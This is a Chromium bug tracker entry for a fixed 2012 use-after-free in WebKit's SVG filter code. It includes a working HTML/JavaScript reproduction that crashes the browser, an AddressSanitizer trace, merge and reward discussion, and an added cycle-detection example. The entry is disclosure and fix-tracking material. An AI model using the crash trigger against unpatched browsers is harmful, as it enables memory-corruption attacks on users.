
Issue 156567

Issue metadata

Status: Fixed
Owner:
Closed: Dec 2012
Cc:
Components:
EstimatedDays: ----
NextAction: ----
OS: ----
Pri: 1
Type: Bug-Security




Security: use-after-free in WebCore::GraphicsContext::paintingDisabled

Reported by miau...@gmail.com, Oct 18 2012

Issue description


VULNERABILITY DETAILS
use-after-free in WebCore::GraphicsContext::paintingDisabled

VERSION
Chrome Version: dev

Chromium: 24.0.1301.0 (Developer Build 162597)
OS: Linux
WebKit: 537.16 (@131643)
JavaScript: V8 3.14.4.1

causes infinite recursion in older versions (prior to the other svg bugfix)

Operating System: 64bit ubuntu precise

REPRODUCTION CASE
<html>
  <head>
    <script>
      onload = function() {
        // Root <svg> element.
        el0 = document.createElementNS('http://www.w3.org/2000/svg', 'svg')
        el0.setAttribute('id', 'el0')
        document.body.appendChild(el0)
        // A <g> inside the root that applies the filter #el2.
        el1 = document.createElementNS('http://www.w3.org/2000/svg', 'g')
        el1.setAttribute('filter', 'url(#el2)')
        el0.appendChild(el1)
        // The filter itself. Its only primitive is an <feImage> whose href points
        // back at the root <svg> (#el0), i.e. at the subtree containing the <g>
        // that applies this very filter: a cyclic resource reference.
        el2 = document.createElementNS('http://www.w3.org/2000/svg', 'filter')
        el2.setAttribute('id', 'el2')
        el0.appendChild(el2)
        el3 = document.createElementNS('http://www.w3.org/2000/svg', 'feImage')
        el3.setAttributeNS('http://www.w3.org/1999/xlink', 'xlink:href', '#el0')
        el2.appendChild(el3)
        // Force layout, then also attach the filter to the root itself so the
        // filter is re-entered while it is still being applied.
        document.body.offsetTop
        el0.setAttribute('filter', 'url(#el2)')
      }
    </script>
  </head>
  <body>
  </body>
</html>


FOR CRASHES, PLEASE INCLUDE THE FOLLOWING ADDITIONAL INFORMATION
Type of crash: tab + asan
Crash State: 

==7986== ERROR: AddressSanitizer heap-use-after-free on address 0x7fffebb2beec at pc 0x55555a030bba bp 0x7fffffff4780 sp 0x7fffffff4778
READ of size 1 at 0x7fffebb2beec thread T0
    #0 0x55555a030bb9 in WebCore::GraphicsContext::paintingDisabled() const ???:0
    #1 0x55555a0abaf2 in WebCore::GraphicsContext::concatCTM(WebCore::AffineTransform const&) ???:0
    #2 0x55555c30a2f9 in WebCore::RenderSVGResourceFilter::postApplyResource(WebCore::RenderObject*, WebCore::GraphicsContext*&, unsigned short, WebCore::Path const*, WebCore::RenderSVGShape const*) ???:0

0x7fffebb2beec is located 108 bytes inside of 144-byte region [0x7fffebb2be80,0x7fffebb2bf10)
freed by thread T0 here:
    #0 0x55555f967df0 in __interceptor_free ??:0
    #1 0x55555a0b2a95 in WebCore::ImageBuffer::~ImageBuffer() ???:0
    #2 0x55555c307e20 in WebCore::RenderSVGResourceFilter::applyResource(WebCore::RenderObject*, WebCore::RenderStyle*, WebCore::GraphicsContext*&, unsigned short) ???:0
    #3 0x55555c04d9dc in WebCore::SVGRenderingContext::prepareToRenderSVGContent(WebCore::RenderObject*, WebCore::PaintInfo&, WebCore::SVGRenderingContext::NeedsGraphicsContextSave) ???:0

Attachments:
svg3.html (826 bytes)
svg3.txt (19.3 KB)
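As an added example (not part of the report or of the WebKit fix), the check below walks the paint dependency graph that the repro builds, where painting an element applies its filter and a filter's feImage paints its href target, and reports the chain along which the filter re-enters itself. The element model, the function names and the sample tree are constructed here so it runs under Node without a browser.

```javascript
// Minimal element model (constructed here, not real DOM nodes) so it runs under Node.
function makeElement(tag, attrs, children) {
  return { tag, attrs: attrs || {}, children: children || [] };
}
function findById(root, id) {
  if (root.attrs.id === id) return root;
  for (const c of root.children) { const hit = findById(c, id); if (hit) return hit; }
  return null;
}
// "filter" attribute -> referenced filter id, e.g. url(#el2) -> "el2".
function filterIdOf(el) {
  const m = /^url\(#([^)]+)\)$/.exec(el.attrs.filter || '');
  return m ? m[1] : null;
}
// Walks the paint dependency graph: painting an element applies its filter, and a
// filter's feImage paints its href target (plus that target's subtree). Returns the
// reference chain of the first cycle found, or null when painting terminates.
function findFilterCycle(root) {
  const onStack = new Set(), chain = [];
  const label = el => `${el.tag}#${el.attrs.id || '?'}`;
  function paint(el) {
    chain.push(label(el));
    const fid = filterIdOf(el), f = fid && findById(root, fid);
    if (f && applyFilter(f)) return true;
    for (const c of el.children) if (paint(c)) return true;
    chain.pop(); return false;
  }
  function applyFilter(f) {
    chain.push(label(f));
    if (onStack.has(f)) return true;   // filter re-entered while still being applied
    onStack.add(f);
    for (const p of f.children) {
      if (p.tag !== 'feImage') continue;
      const target = findById(root, (p.attrs['xlink:href'] || '').replace(/^#/, ''));
      if (target && paint(target)) return true;
    }
    onStack.delete(f); chain.pop(); return false;
  }
  return paint(root) ? chain : null;
}
// Constructed sample mirroring the report's tree after its last setAttribute call.
function reproTree() {
  return makeElement('svg', { id: 'el0', filter: 'url(#el2)' }, [
    makeElement('g', { id: 'el1', filter: 'url(#el2)' }),
    makeElement('filter', { id: 'el2' }, [makeElement('feImage', { 'xlink:href': '#el0' })]),
  ]);
}
```

For the repro tree the chain comes back as svg#el0 -> filter#el2 -> svg#el0 -> filter#el2, which is exactly the re-entry that lets the nested applyResource free the ImageBuffer the outer postApplyResource still uses.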
Cc: pdr@chromium.org fmalita@chromium.org
Labels: WebKit-SVG
Owner: schenney@chromium.org
Status: Assigned
Labels: WebKit-ID-94652
Labels: Merge-Requested
Apparently BugDroid failed to pick up that this was fixed in WebKit r132856: <http://trac.webkit.org/changeset/132856>.

Merge requested for m23. Reward?
Status: FixUnreleased
Labels: -Pri-0 -Area-Undefined -Merge-Requested Pri-1 Area-WebKit Merge-Approved reward-topanel Mstone-23 SecImpacts-Stable SecImpacts-Beta Stability-AddressSanitizer
I don't think it will make it to m23 stable (needs bake time on trunk), but m23 stable first patch.
Labels: -Restrict-View-SecurityTeam Restrict-View-SecurityNotify SecSeverity-High
Sorry, I interpret Abhishek's comment to mean don't merge, but the MergeApproved flag is set. Please clarify. :-)

And the Chromium Notifier just IMed me. also apparently upset.

Comment 9 by kareng@google.com, Oct 30 2012

Labels: -Merge-Approved Merge-Requested
Please don't merge just now. I'm still in the process of getting a good build. If I read Abhishek's comment right he's saying we'll take it for stable 2. I will give you a heads up as soon as it's ok to merge. Chris/Abhishek, is that ok?

(Setting back to requested so I don't lose it.)
Hey Karen, generally, "Merge-Approved" still means we'll wait for you to say it's ok. Security merges are tackled pretty much by myself or Abhishek and we do not fire them off indiscriminately :P
Labels: -Merge-Requested Merge-Approved
Answer to first question: Security bugs have blanket merge approval, we use the flag to keep track of which bugs to merge. But we do the actual merge when the merge window opens (and after letting it bake and checking with the RM)

Answer to second question: ignore that, we need to get that fixed. known issue.

Overall conclusion: Keep fixing awesome bugs, leave the merges to the security team :)

I have talked to Karen and told her that we are not merging this to branch right now, but for the next m23 patch.
Labels: -reward-topanel reward-1000 reward-unpaid
$1000 for miaubiz!
Labels: -Merge-Approved Merge-Merged
M23: http://trac.webkit.org/changeset/134258
Labels: -reward-unpaid
Payment in system as part of $3000 batch.
Status: Fixed
Project Member

Comment 18 by bugdroid1@chromium.org, Mar 10 2013

Labels: -Type-Security -Area-WebKit -WebKit-SVG -Mstone-23 -SecImpacts-Stable -SecImpacts-Beta -Stability-AddressSanitizer -SecSeverity-High Cr-Content Security-Impact-Stable Security-Impact-Beta Cr-Content-SVG M-23 Performance-Memory-AddressSanitizer Type-Bug-Security Security-Severity-High
Labels: -Restrict-View-SecurityNotify
Project Member

Comment 20 by bugdroid1@chromium.org, Mar 21 2013

Labels: -Security-Severity-High Security_Severity-High
Project Member

Comment 21 by bugdroid1@chromium.org, Mar 21 2013

Labels: -Security-Impact-Stable Security_Impact-Stable
Project Member

Comment 22 by bugdroid1@chromium.org, Mar 21 2013

Labels: -Security-Impact-Beta Security_Impact-Beta
Project Member

Comment 23 by bugdroid1@chromium.org, Apr 1 2013

Labels: -Performance-Memory-AddressSanitizer Stability-Memory-AddressSanitizer
Project Member

Comment 24 by bugdroid1@chromium.org, Apr 5 2013

Labels: -Cr-Content Cr-Blink
Project Member

Comment 25 by bugdroid1@chromium.org, Apr 6 2013

Labels: -Cr-Content-SVG Cr-Blink-SVG
Project Member

Comment 27 by sheriffbot@chromium.org, Jun 14 2016

Labels: -security_impact-beta
Project Member

Comment 28 by sheriffbot@chromium.org, Oct 1 2016

This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Project Member

Comment 29 by sheriffbot@chromium.org, Oct 2 2016

This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Labels: allpublic
